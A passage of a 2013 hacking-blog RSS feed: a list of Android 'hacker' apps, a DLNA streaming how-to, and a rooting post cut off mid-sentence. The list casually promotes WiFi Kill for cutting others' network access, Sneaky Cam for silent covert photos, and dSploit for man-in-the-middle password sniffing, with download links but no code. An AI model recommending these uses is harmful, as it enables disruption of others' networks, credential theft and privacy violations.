copy your video streaming links&amp;nbsp; and open your vlc then go to Media options and&amp;nbsp; click on Open&amp;nbsp; Networkstream&amp;nbsp;&amp;nbsp; and paste your link and click on play</itunes:summary><itunes:keywords>Hacking</itunes:keywords></item><item><title>Top Best apps for Hackers &amp;amp; Creativity</title><link>http://bambahacks.blogspot.com/2013/11/top-best-apps-for-hackers-creativity.html</link><category>Android</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Tue, 5 Nov 2013 02:30:00 -0800</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-4670434626441035720.post-1608738748067463272</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="text-align: left;"&gt;Hi Guyz ,Today are you ready to make your android phone something different. We talk about some &amp;nbsp;best android apps that &amp;nbsp;helpful for some hackers ,E-hackers,Creativity People and lots of..&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;It's Show time...&lt;/h3&gt;&lt;div&gt;&lt;br /&gt;&lt;h2&gt;&lt;ol style="text-align: left;"&gt;&lt;li&gt;&lt;span style="background-color: red;"&gt;WiFi Kill&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;span style="font-size: large; font-weight: normal;"&gt;&lt;span style="color: #0080bf;"&gt;&lt;b&gt;DESCRIPTION&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br style="font-size: medium; font-weight: normal;" /&gt;&lt;span style="font-size: medium; font-weight: normal;"&gt;Well, with this app you can disable internet connection for a device on the same network. So if someone (anyone) is abusing the internet wasting precious bandwidth for a Justin Bieber videoclips you could just kill their connection and stay happy with a full bandwidth just for yourself.&lt;/span&gt;&lt;/h2&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://paranoid.me/wifikill/images/wfk_1_thumb.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://paranoid.me/wifikill/images/wfk_1_thumb.png" height="320" width="180" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;h2&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;&lt;a href="http://forum.xda-developers.com/showthread.php?t=1282900" target="_blank"&gt;Download&lt;/a&gt;&lt;/div&gt;&lt;/h2&gt;&lt;h3 style="text-align: left;"&gt;2&lt;span style="background-color: #6fa8dc;"&gt;.Unified Remote&lt;/span&gt;&lt;/h3&gt;&lt;div&gt;&lt;span style="background-color: white; color: #555555; font-family: sans-serif; font-size: 22px; font-weight: normal; line-height: 31.359375px;"&gt;Turn your smartphone into a wireless universal remote control for your Windows PC.&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUEdmM_ctXQBkkkc0dk8BJkZeJkfy3hbTF2lTZMfLSDWU0yuinQVw1IAw918KQMAQ51QDI8AQ9uv8xWMJfvX0-1Dei9bCUFVVsEhV5LmDrFY_HAgM69dtgcNN37SKihJE_eNMC-TxTwvKc/s1600/Screenshot1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUEdmM_ctXQBkkkc0dk8BJkZeJkfy3hbTF2lTZMfLSDWU0yuinQVw1IAw918KQMAQ51QDI8AQ9uv8xWMJfvX0-1Dei9bCUFVVsEhV5LmDrFY_HAgM69dtgcNN37SKihJE_eNMC-TxTwvKc/s1600/Screenshot1.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFP62eFtGCxoq5QNiXdWVoTrtpeKFPn0a-0kqvAmQiEGort3Z2CjP3cnLqSTeIUglYSR-k3LWO_7jWB_o5whxGcMyPqbwws-A4_SBewLbP9NeXSIHYCjcNiZFeyIotEeCYPzrjLYdoopCJ/s1600/Screenshot3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFP62eFtGCxoq5QNiXdWVoTrtpeKFPn0a-0kqvAmQiEGort3Z2CjP3cnLqSTeIUglYSR-k3LWO_7jWB_o5whxGcMyPqbwws-A4_SBewLbP9NeXSIHYCjcNiZFeyIotEeCYPzrjLYdoopCJ/s1600/Screenshot3.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEATj3vir0rpDD4ybXoV33MxuOWH3MbnM9h1kwTGXXW9Ony3N67VPdHjss0_S-eJFb8_xj41nZk7Svf9rLjNtSGctxnUB9MsVlZDY_Z-re3Ha_M8uxOoSyYvDQTo7nA2OrtomX6riUENN0/s1600/Screenshot4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEATj3vir0rpDD4ybXoV33MxuOWH3MbnM9h1kwTGXXW9Ony3N67VPdHjss0_S-eJFb8_xj41nZk7Svf9rLjNtSGctxnUB9MsVlZDY_Z-re3Ha_M8uxOoSyYvDQTo7nA2OrtomX6riUENN0/s1600/Screenshot4.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.unifiedremote.com/" target="_blank"&gt;Download&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;h3 style="text-align: left;"&gt;3.Sneaky cam&lt;/h3&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;span style="background-color: whitesmoke; color: #333333; font-family: Roboto, Arial, sans-serif; font-size: 28px; font-weight: 100; line-height: 39px;"&gt;Description&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: whitesmoke; border: 0px; color: #333333; font-family: Roboto, Arial, sans-serif; font-size: 14px; font-weight: 300; line-height: 20px; margin-bottom: 5px; padding: 0px;"&gt;What does it do?&lt;/div&gt;&lt;br /&gt;&lt;div style="background-color: whitesmoke; border: 0px; color: #333333; font-family: Roboto, Arial, sans-serif; font-size: 14px; line-height: 20px; margin-bottom: 5px; padding: 0px;"&gt;Sneaky Cam allows you to take photos with your phone's camera discreetly without letting others around you know what you are up to!&lt;br /&gt;Absolutely perfect for sneaking a pic in plain sight!&lt;/div&gt;&lt;div style="background-color: whitesmoke; border: 0px; color: #333333; font-family: Roboto, Arial, sans-serif; font-size: 14px; line-height: 20px; margin-bottom: 5px; padding: 0px;"&gt;How does it work?&lt;/div&gt;&lt;div style="background-color: whitesmoke; border: 0px; color: #333333; font-family: Roboto, Arial, sans-serif; font-size: 14px; line-height: 20px; margin-bottom: 5px; padding: 0px;"&gt;Instead of showing you the preview of the camera it shows you a screen of your choice available in the Preferences menu. When the user touches the screen a quick and discreet notification tells the user that the picture has been taken and the picture is saved to the folder 'Sneaky Cam' which is accessible from your Gallery.&lt;br /&gt;You can also set the transparency of the screen so that you can see faintly or strongly the preview of the camera.&lt;br /&gt;Or as an option if you select on screen preview, you will get a small preview of what you are about to click..&lt;br /&gt;It disables all sounds so no one hears the shutter sound.&lt;/div&gt;&lt;div style="background-color: whitesmoke; border: 0px; color: #333333; font-family: Roboto, Arial, sans-serif; font-size: 14px; line-height: 20px; margin-bottom: 5px; padding: 0px;"&gt;&lt;span id="goog_1111169798"&gt;&lt;/span&gt;&lt;span id="goog_1111169799"&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="background-color: whitesmoke; border: 0px; color: #333333; font-family: Roboto, Arial, sans-serif; font-size: 14px; line-height: 20px; margin-bottom: 5px; padding: 0px;"&gt;&lt;a href="https://play.google.com/store/apps/details?id=an.droid.kit.sneaky_cam&amp;amp;hl=en" target="_blank"&gt;Download&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;h3 style="text-align: left;"&gt;4. Fpse Emulator&lt;/h3&gt;&amp;nbsp;FPSE for Android is the fastest and most consistent PSone (also known as  PSX or Playstation 1) emulator devices mano.Crear an ISO image from  your favorite games and enjoy playing on your Android phone. &lt;br /&gt;Features: &lt;br /&gt;-High performance &lt;br /&gt;-High compatibility &lt;br /&gt;-High quality sound &lt;br /&gt;-Real-time save states &lt;br /&gt;-Audio track emulation (with reference files) &lt;br /&gt;-Force-feedback &lt;br /&gt;-Dynamically overlay pads can be loaded &lt;br /&gt;-Emulation Guncon &lt;br /&gt;-Analog Stick emulation (touchscreen slide) &lt;br /&gt;-Compatible with G-Sensor, Touchscreen and hardware keys &lt;br /&gt;-Supports. IMG, ISO,. Bin. Cue, nrg. And disc formats. Image Z&lt;br /&gt;&lt;br /&gt;&amp;nbsp;with these emulator you play Tekken 3 my favourite in your android phone..&lt;br /&gt;&lt;br /&gt;&lt;a href="https://db.tt/39C5z0r7" target="_blank"&gt;Download&lt;/a&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3CPf9c7_-EdyRBzEhvnRoeqXd1_QanzUUG7eRdkQ5XQ_7hZkcYk_5AnH88IFYZRVgLfbO0iH7jCpzVzRSJ0ryQnAXa5uHulZ2Fbb5-pbqvaPuyOTKRldGkwdEhae_Ou1QPn18ZGoUbHfE/s1600/default.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3CPf9c7_-EdyRBzEhvnRoeqXd1_QanzUUG7eRdkQ5XQ_7hZkcYk_5AnH88IFYZRVgLfbO0iH7jCpzVzRSJ0ryQnAXa5uHulZ2Fbb5-pbqvaPuyOTKRldGkwdEhae_Ou1QPn18ZGoUbHfE/s1600/default.jpeg" height="272" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;5.Dsploit&lt;br /&gt;dSploit is an Android network analysis and penetration suite which aims to offer to IT security experts/geeks &lt;b&gt;the most complete and advanced professional toolkit&lt;/b&gt; to perform network security assesments on a mobile device.&lt;br /&gt;&lt;br /&gt;Once dSploit is started, you will be able to easily map your network,  fingerprint alive hosts operating systems and running services, search  for &lt;b&gt;known vulnerabilities&lt;/b&gt;, crack logon procedures of many tcp protocols, perform man in the middle attacks such as &lt;b&gt;password sniffing&lt;/b&gt; ( with common protocols dissection ), &lt;b&gt;real time traffic manipulation&lt;/b&gt;, etc, etc .&lt;br /&gt;&amp;nbsp;&lt;b&gt;Requirements&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;An Android device with at least the &lt;b&gt;2.3&lt;/b&gt; ( Gingerbread ) version of the OS. ( 2.3 support since v1.0.5b ).&lt;/li&gt;&lt;li&gt;The device must be &lt;b&gt;rooted&lt;/b&gt;&lt;/li&gt;&lt;li&gt;The device must have a &lt;b&gt;BusyBox full install&lt;/b&gt;, this means with every utility installed ( not the partial installation ).&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;a href="http://cloud.github.com/downloads/evilsocket/dsploit/dSploit-1.0.31b.apk" target="_blank"&gt;Download&lt;/a&gt;&amp;nbsp;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUEdmM_ctXQBkkkc0dk8BJkZeJkfy3hbTF2lTZMfLSDWU0yuinQVw1IAw918KQMAQ51QDI8AQ9uv8xWMJfvX0-1Dei9bCUFVVsEhV5LmDrFY_HAgM69dtgcNN37SKihJE_eNMC-TxTwvKc/s72-c/Screenshot1.png" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>What is DLNA</title><link>http://bambahacks.blogspot.com/2013/10/what-is-dlna.html</link><category>Android</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Sun, 20 Oct 2013 09:05:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-4670434626441035720.post-3378395363741873768</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;h1 class="title" style="background-color: white; border: 0px; color: #262625; font-family: Vollkorn, Georgia, serif; font-size: 22px; font-weight: 400; line-height: 22px; margin: 0px; padding: 0px;"&gt;How To Stream Media From Android To PC With DLNA Server&amp;nbsp;&lt;/h1&gt;&lt;h1 class="title" style="background-color: white; border: 0px; color: #262625; font-family: Vollkorn, Georgia, serif; font-size: 22px; font-weight: 400; line-height: 22px; margin: 0px; padding: 0px;"&gt;&lt;a href="http://en.wikipedia.org/wiki/Digital_Living_Network_Alliance" rel="external nofollow" style="border: 0px; color: #2266aa; font-family: Verdana, sans-serif; font-size: 13px; line-height: 20px; margin: 0px; padding: 0px; text-align: justify; text-decoration: none;" target="_blank"&gt;DLNA&lt;/a&gt;&lt;span style="color: #333333; font-family: Verdana, sans-serif; font-size: 13px; line-height: 20px; text-align: justify;"&gt;&amp;nbsp;is designed to act as a bridge between your various electronic devices, so you can&amp;nbsp;&lt;/span&gt;&lt;span class="IL_AD" id="IL_AD7" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(27, 142, 222) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; color: rgb(27, 142, 222) !important; cursor: pointer !important; display: inline !important; float: none !important; font-family: Verdana, sans-serif; font-size: 13px; line-height: 20px; margin: 0px; padding: 0px 0px 1px !important; position: static; text-align: justify;"&gt;watch a video&lt;/span&gt;&lt;span style="color: #333333; font-family: Verdana, sans-serif; font-size: 13px; line-height: 20px; text-align: justify;"&gt;&amp;nbsp;from your PC on your big-screen TV, play an MP3 from your smartphone on your stereo, or send shots from the family photo album to your&amp;nbsp;&lt;/span&gt;&lt;span class="IL_AD" id="IL_AD4" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(27, 142, 222) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; color: rgb(27, 142, 222) !important; cursor: pointer !important; display: inline !important; float: none !important; font-family: Verdana, sans-serif; font-size: 13px; line-height: 20px; margin: 0px; padding: 0px 0px 1px !important; position: static; text-align: justify;"&gt;wireless printer&lt;/span&gt;&lt;span style="color: #333333; font-family: Verdana, sans-serif; font-size: 13px; line-height: 20px; text-align: justify;"&gt;&amp;nbsp;via your tablet, it shouldn’t matter where your media is or what device you’re currently holding. then we can use Android&lt;/span&gt;&lt;i style="border: 0px; color: #333333; font-family: Verdana, sans-serif; font-size: 13px; line-height: 20px; margin: 0px; padding: 0px; text-align: justify;"&gt;DLNA server&lt;/i&gt;&lt;span style="color: #333333; font-family: Verdana, sans-serif; font-size: 13px; line-height: 20px; text-align: justify;"&gt;&amp;nbsp;stream media to PCs with WIFI for home sharing.&lt;/span&gt;&lt;/h1&gt;&lt;div&gt;&lt;h2 style="background-color: white; border: 0px; color: #333333; font-family: Verdana, sans-serif; font-size: 18px; line-height: 38px; margin: 0px; padding: 0px; text-align: justify;"&gt;Stream Media from Android To PC With DLNA Server&lt;/h2&gt;&lt;/div&gt;&lt;div&gt;&lt;div style="background-color: white; border: 1px; color: #333333; font-family: Verdana, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 5px; padding: 6px 0px; text-align: justify;"&gt;&lt;span style="background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; margin: 0px; padding: 0px; text-decoration: underline;"&gt;&lt;span style="background-color: transparent; border: 0px; font-weight: 700; margin: 0px; padding: 0px;"&gt;Music&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: white; border: 1px; font-family: Verdana, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 5px; padding: 6px 0px; text-align: justify;"&gt;&lt;span style="color: #333333;"&gt;First your PC already build in Windows Media Player&amp;nbsp;12, then go to Stream option &lt;/span&gt;&lt;span style="color: #1b8ede;"&gt;&amp;gt; Enable remote control of my player&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://sites.google.com/a/wongsk.twbbs.org/wongsk/2013-techgravy/DLNA%20server-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="151" src="https://sites.google.com/a/wongsk.twbbs.org/wongsk/2013-techgravy/DLNA%20server-1.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="background-color: white; border: 1px; font-family: Verdana, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 5px; padding: 6px 0px; text-align: justify;"&gt;&lt;span style="color: #333333;"&gt;Select a song on Android, then tap on select&amp;nbsp;&lt;/span&gt;&lt;span style="color: #333333;"&gt;player&lt;/span&gt;&lt;span style="color: #333333;"&gt;&amp;nbsp;option&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://sites.google.com/a/wongsk.twbbs.org/wongsk/2013-techgravy/DLNA%20server-7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="640" src="https://sites.google.com/a/wongsk.twbbs.org/wongsk/2013-techgravy/DLNA%20server-7.png" width="386" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;span style="text-align: justify;"&gt;Enable WIFI network on Android and Android will scan&amp;nbsp;&lt;/span&gt;&lt;span style="text-align: justify;"&gt;media player&lt;/span&gt;&lt;span style="text-align: justify;"&gt;&amp;nbsp;within network. Tapping on PC name allow Android connect to Windows&amp;nbsp;&lt;/span&gt;&lt;span style="text-align: justify;"&gt;Media Player&lt;/span&gt;&lt;span style="text-align: justify;"&gt;.&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://sites.google.com/a/wongsk.twbbs.org/wongsk/2013-techgravy/DLNA%20server-6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="640" src="https://sites.google.com/a/wongsk.twbbs.org/wongsk/2013-techgravy/DLNA%20server-6.png" width="386" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;span style="text-align: justify;"&gt;Now play the song on android. you may notice the music stream to dlna Windows&amp;nbsp;&lt;/span&gt;&lt;span style="text-align: justify;"&gt;Media Player&lt;/span&gt;&lt;span style="text-align: justify;"&gt;and got sound from PC speaker&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://sites.google.com/a/wongsk.twbbs.org/wongsk/2013-techgravy/DLNA%20server-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="279" src="https://sites.google.com/a/wongsk.twbbs.org/wongsk/2013-techgravy/DLNA%20server-2.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="border: 1px; margin-bottom: 5px; padding: 6px 0px;"&gt;&lt;span style="background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; margin: 0px; padding: 0px; text-decoration: underline;"&gt;Photo and video&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="background-color: white; border: 1px; color: #333333; font-family: Verdana, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 5px; padding: 6px 0px; text-align: justify;"&gt;Start up Android photo album and tap on select&amp;nbsp;player&amp;nbsp;option. Turn on WIFI and search your PC within WIFI network, tap on PC name connect to WMP.&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://sites.google.com/a/wongsk.twbbs.org/wongsk/2013-techgravy/DLNA%20server-5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="https://sites.google.com/a/wongsk.twbbs.org/wongsk/2013-techgravy/DLNA%20server-5.png" width="193" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;span style="background-color: white; color: #333333; font-family: Verdana, sans-serif; font-size: 13px; line-height: 20px; text-align: justify;"&gt;Windows&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: white; color: #333333; font-family: Verdana, sans-serif; font-size: 13px; line-height: 20px; text-align: justify;"&gt;Media Player&lt;/span&gt;&lt;span style="background-color: white; color: #333333; font-family: Verdana, sans-serif; font-size: 13px; line-height: 20px; text-align: justify;"&gt;&amp;nbsp;start playing photos which stream from android phone automatically.&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://sites.google.com/a/wongsk.twbbs.org/wongsk/2013-techgravy/DLNA%20server-4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="215" src="https://sites.google.com/a/wongsk.twbbs.org/wongsk/2013-techgravy/DLNA%20server-4.PNG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;a href="https://www.blogger.com/null" name="more"&gt;&lt;/a&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;span style="background-color: white; color: #333333; font-family: Verdana, sans-serif; font-size: 13px; line-height: 20px; text-align: justify;"&gt;But these system are automated now you can find out more creativity on Google Play store&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;span style="background-color: white; color: #333333; font-family: Verdana, sans-serif; font-size: 13px; line-height: 20px; text-align: justify;"&gt;you can find out more apps for your dlna service ..ex..&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;span style="background-color: white; color: #333333; font-family: Verdana, sans-serif; font-size: 13px; line-height: 20px; text-align: justify;"&gt;&lt;a href="https://play.google.com/store/apps/details?id=com.bubblesoft.android.bubbleupnp&amp;amp;hl=en" target="_blank"&gt;BubbleUPnP UPnP/DLNA&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: white; border: 1px; font-family: Verdana, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 5px; padding: 6px 0px; text-align: justify;"&gt;&lt;span style="color: #333333;"&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;span style="text-align: justify;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;span style="text-align: justify;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>How To Root In Android</title><link>http://bambahacks.blogspot.com/2013/10/how-to-root-in-android.html</link><category>Android</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Sun, 20 Oct 2013 08:30:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-4670434626441035720.post-7677339386575707269</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;h1 class="title" style="background-color: white; border: 0px; font-family: Vollkorn, Georgia, serif; font-size: 22px; font-weight: 400; line-height: 22px; margin: 0px; padding: 0px;"&gt;&lt;span style="color: red;"&gt;How To Root Android In One Click And Unroot&lt;/span&gt;&lt;/h1&gt;&lt;div&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;span style="background-color: white; color: #333333; font-family: Verdana, sans-serif; font-size: 13px; line-height: 20px; text-align: justify;"&gt;Most of android users would like to root their devices to get full advantage of the interface but&lt;/span&gt;&lt;span style="background-color: white; border: 0px; color: #333333; font-family: Verdana, sans-serif; font-size: 13px; font-weight: 700; line-height: 20px; margin: 0px; padding: 0px; text-align: justify;"&gt;root Android&lt;/span&gt;&lt;span style="background-color: white; color: #333333; font-family: Verdana, sans-serif; font-size: 13px; line-height: 20px; text-align: justify;"&gt;&amp;nbsp;is not an easy job and risky that the devices may get bricked in worst case. A member from XDA&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: white; font-family: Verdana, sans-serif; font-size: 13px; line-height: 20px; text-align: justify;"&gt;&lt;span style="color: #1b8ede;"&gt;developers&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: white; color: #333333; font-family: Verdana, sans-serif; font-size: 13px; line-height: 20px; text-align: justify;"&gt;&amp;nbsp;forum, Alephzain has released&amp;nbsp;&lt;/span&gt;&lt;i style="background-color: white; border: 0px; color: #333333; font-family: Verdana, sans-serif; font-size: 13px; line-height: 20px; margin: 0px; padding: 0px; text-align: justify;"&gt;root android&lt;/i&gt;&lt;span style="background-color: white; color: #333333; font-family: Verdana, sans-serif; font-size: 13px; line-height: 20px; text-align: justify;"&gt;&amp;nbsp;app called Frameroot which would help in rooting the device.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;div style="background-color: white; border: 1px; color: #333333; font-family: Verdana, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 5px; padding: 6px 0px; text-align: justify;"&gt;&lt;span style="background-color: transparent; border: 0px; font-weight: 700; margin: 0px; padding: 0px;"&gt;Frameroot&lt;/span&gt;&amp;nbsp;root&amp;nbsp;&lt;span class="IL_AD" id="IL_AD5" style="background-attachment: scroll !important; background-color: transparent !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(27, 142, 222) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; color: rgb(27, 142, 222) !important; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px; padding: 0px 0px 1px !important; position: static;"&gt;android apk&lt;/span&gt;&amp;nbsp;let users rooting their devices in&amp;nbsp;&lt;span class="IL_AD" id="IL_AD4" style="background-attachment: scroll !important; background-color: transparent !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(27, 142, 222) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; color: rgb(27, 142, 222) !important; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px; padding: 0px 0px 1px !important; position: static;"&gt;one click&lt;/span&gt;&amp;nbsp;through some exploit such as Gandalf, Pippin and others. The rooting process running without connected to computer and just install Frameroot apk into&amp;nbsp;&lt;span class="IL_AD" id="IL_AD7" style="background-attachment: scroll !important; background-color: transparent !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(27, 142, 222) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; color: rgb(27, 142, 222) !important; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px; padding: 0px 0px 1px !important; position: static;"&gt;phone and&lt;/span&gt;&amp;nbsp;run it, the app will root the devices 